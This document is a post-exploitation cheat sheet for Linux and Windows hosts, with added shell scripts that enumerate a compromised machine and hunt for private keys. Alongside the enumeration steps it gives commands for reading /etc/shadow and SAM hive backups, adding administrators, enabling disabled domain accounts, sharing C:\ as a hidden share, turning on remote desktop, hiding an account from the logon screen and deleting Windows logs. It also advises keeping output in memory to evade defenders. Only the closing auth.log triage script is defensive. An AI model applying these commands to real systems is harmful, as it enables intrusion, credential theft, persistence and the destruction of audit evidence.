Basic information gathering
Linux
- /etc/resolv.conf
- /etc/passwd
- /etc/shadow
- whoami and who -a
- ifconfig -a, iptables -L -n, netstat -r (ip addr / ip route on hosts where net-tools is absent)
- uname -a, ps aux
- dpkg -l | head
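The commands above, gathered into one collector. This is an added example, not part of the original cheat sheet: it runs each enumeration command with a fallback to iproute2 where ifconfig/netstat are missing, keeps permission errors in the report instead of aborting, and classifies each sensitive file as readable, unreadable or missing for the current user. The function and section names are the example's own.

```shell
#!/bin/sh
# Added example: Linux post-exploitation baseline collector (not from the original page).

have() { command -v "$1" >/dev/null 2>&1; }

# Print a titled section with a command's output, or a note if the tool is missing.
# Errors such as iptables' "permission denied" are kept in the report on purpose.
section() {
  title=$1; shift
  printf '\n### %s\n' "$title"
  if have "$1"; then "$@" 2>&1 || true; else printf '(%s not available)\n' "$1"; fi
}

# Classify a sensitive file as readable / unreadable / missing for the current user,
# so the report states whether /etc/shadow hashes can be taken without escalating.
file_access() {
  if [ ! -e "$1" ]; then echo missing
  elif [ -r "$1" ]; then echo readable
  else echo unreadable
  fi
}

linux_baseline() {
  section "identity" id
  section "logged-in users" who -a
  section "kernel" uname -a
  section "processes" ps aux
  # net-tools is often absent on modern distributions; fall back to iproute2
  if have ifconfig; then section "interfaces" ifconfig -a; else section "interfaces" ip addr; fi
  if have netstat; then section "routes" netstat -r; else section "routes" ip route; fi
  section "firewall (needs root)" iptables -L -n
  printf '\n### packages (first lines)\n'
  if have dpkg; then dpkg -l | head; elif have rpm; then rpm -qa | head; else echo '(no dpkg/rpm)'; fi
  printf '\n### sensitive files\n'
  for f in /etc/resolv.conf /etc/passwd /etc/shadow; do
    printf '%s: %s\n' "$f" "$(file_access "$f")"
  done
}

# Usage: linux_baseline > /dev/shm/baseline.txt   (memory-backed, leaves nothing on disk)
```

Write the report somewhere memory-backed such as /dev/shm rather than under /tmp, which is one of the locations listed below as worth collecting from and is equally visible to a defender.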
Windows
- ipconfig /all, ipconfig /displaydns, netstat -bnao, netstat -r
- net view, net view /domain
- net user /domain, net user %username% /domain
- net accounts, net share
- net localgroup administrators username /add (modifies the host: adds username to the local Administrators group)
- net group "Domain Controllers" /domain
- net share name$=C:\ /unlimited (modifies the host: publishes C:\ as the hidden share name$)
- net user username /active:yes /domain (modifies the domain: enables a disabled account)
WMIC (Windows Management Instrumentation command line)
- wmic nicconfig get ipaddress,macaddress
- wmic computersystem get username
- wmic netlogin get name,lastlogon
- wmic process get caption,executablepath,commandline
- wmic process where name="calc.exe" call terminate
- wmic os get name,servicepackmajorversion
- wmic product get name,version (slow, and each enumerated product writes a Windows Installer event to the Application log)
- wmic product where name="name" call uninstall /nointeractive
- wmic share get /ALL
- wmic /node:"machinename" /namespace:\\root\cimv2\terminalservices path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" (enables Remote Desktop on the remote host; the class lives in the TerminalServices namespace, not the default root\cimv2)
- wmic nteventlog get path,filename,writeable
Collecting sensitive data
Linux
- /etc; /usr/local/etc
- /etc/passwd; /etc/shadow
- .ssh; .gnupg (public and private keys)
- E-mail and data files
- Business databases; authentication server databases
- /tmp
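A key hunt over the locations above. This is an added example, not from the original page: it finds private keys by content (so a key copied to an innocuous name under a backup directory is still caught), lists GnuPG directories by location because keyrings are binary, and tags each key with whether it is world-readable, which is what makes it usable from a low-privileged shell. The sample home directory is constructed with fake key bodies; all function names are the example's own.

```shell
#!/bin/sh
# Added example: hunt for key material under a home or backup tree (not from the original page).

# Files containing a private-key PEM header. -r recursive, -l names only,
# -s silence unreadable-file errors, -E extended regex; "--" because the pattern starts with dashes.
find_private_keys() {
  grep -rlsE -- '-----BEGIN (OPENSSH|RSA|EC|DSA|PGP) PRIVATE KEY' "$1" | sort
}

# GnuPG keyrings are binary, so match them by location instead of content.
gnupg_dirs() {
  find "$1" -type d -name .gnupg 2>/dev/null | sort
}

# Every private key under the tree, tagged with whether the world-readable bit (o+r) is set.
key_report() {
  find_private_keys "$1" | while IFS= read -r f; do
    if [ -n "$(find "$f" -perm -o=r)" ]; then echo "WORLD-READABLE $f"; else echo "owner-only $f"; fi
  done
}

# Constructed sample home directory for a dry run (fake key bodies, not real keys).
make_sample_home() {
  d=$(mktemp -d)
  mkdir -p "$d/.ssh" "$d/.gnupg" "$d/backup"
  printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'b3BlbnNzaC1rZXktdjEAAAAA...' '-----END OPENSSH PRIVATE KEY-----' > "$d/.ssh/id_ed25519"
  printf '%s\n' 'ssh-ed25519 AAAAC3Nza... user@host' > "$d/.ssh/id_ed25519.pub"
  # a key someone stashed under an innocuous name outside .ssh
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'MIIEowIBAAKCAQEA...' '-----END RSA PRIVATE KEY-----' > "$d/backup/notes.txt"
  printf '%s\n' 'nothing secret here' > "$d/readme"
  chmod 600 "$d/.ssh/id_ed25519"
  chmod 644 "$d/.ssh/id_ed25519.pub" "$d/backup/notes.txt" "$d/readme"
  echo "$d"
}

# Dry run; on a host: key_report /home; key_report /root; gnupg_dirs /home
sample=$(make_sample_home)
key_report "$sample"
gnupg_dirs "$sample"
rm -rf "$sample"
```

The content match is deliberately broader than the `.ssh` / `.gnupg` paths in the list: keys end up in backup directories, deployment scripts and /tmp far more often than in their canonical location.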
Windows
- SAM database; registry hives (the live hive under System32\config is locked while Windows runs, hence the backup copies below; decrypting the hashes also needs the SYSTEM hive)
- %SYSTEMROOT%\repair\SAM
- %SYSTEMROOT%\System32\config\RegBack\SAM
- Business databases; authentication databases
- Temporary file directories
- %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\
Hiding a newly created account from the logon screen
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v uname /t REG_DWORD /d 0
(uname is the account name; the 0 value hides it from the logon screen and the User Accounts panel only, not from net user, the SAM or the Security event log)
Deleting log files under the Windows directory:
del %WINDIR%\*.log /a /s /q /f
History
Logs
- auth.log / secure
- btmp / wtmp (binary; read with lastb / last)
- lastlog / faillog (binary; read with lastlog / faillog)
Other logs, HIDS, etc.
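Triage of auth.log / secure with plain text tools, as an added example that is not part of the original page. The functions read log lines from stdin, so they work on a real file (`failed_logins_by_ip < /var/log/auth.log`) or on the constructed sample embedded below, and show the two things a reviewer of this log looks for first: which sources are hammering sshd, and what was run through sudo. The sample lines are constructed, and the function names are the example's own.

```shell
#!/bin/sh
# Added example: auth.log / secure triage with grep, sed and awk (not from the original page).

# Count "Failed password" events per source IP; prints "ip count", busiest first.
failed_logins_by_ip() {
  grep -E 'sshd\[[0-9]+\]: Failed password' \
    | sed -E 's/.* from ([0-9.]+) port .*/\1/' \
    | sort | uniq -c | sort -rn \
    | awk '{print $2, $1}'
}

# Source IPs with at least N failed logins (default 3): the brute-force shortlist.
brute_force_sources() {
  threshold=${1:-3}
  failed_logins_by_ip | awk -v t="$threshold" '$2 >= t {print $1}'
}

# Commands executed through sudo, as "user command".
sudo_commands() {
  grep -E ' sudo: ' | sed -E 's/.* sudo: +([^ ]+) : .*COMMAND=(.*)$/\1 \2/'
}

# Constructed sample in syslog format (not from a real host).
SAMPLE_AUTH_LOG='Mar  3 10:01:02 host sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 50112 ssh2
Mar  3 10:01:05 host sshd[1203]: Failed password for root from 203.0.113.5 port 50114 ssh2
Mar  3 10:01:09 host sshd[1205]: Failed password for root from 203.0.113.5 port 50116 ssh2
Mar  3 10:02:00 host sshd[1210]: Accepted publickey for deploy from 198.51.100.7 port 41000 ssh2
Mar  3 10:03:11 host sshd[1222]: Failed password for invalid user test from 198.51.100.9 port 43210 ssh2
Mar  3 10:04:00 host sudo:    root : TTY=pts/0 ; PWD=/root ; COMMAND=/bin/cat /etc/shadow'

# Dry run on the sample; on a host replace the printf with: < /var/log/auth.log
printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_sources 3
printf '%s\n' "$SAMPLE_AUTH_LOG" | sudo_commands
```

The same "Failed password" and sudo line formats appear in /var/log/secure on Red Hat derivatives, so the functions apply there unchanged; btmp and wtmp cannot be grepped this way and need lastb / last as noted above.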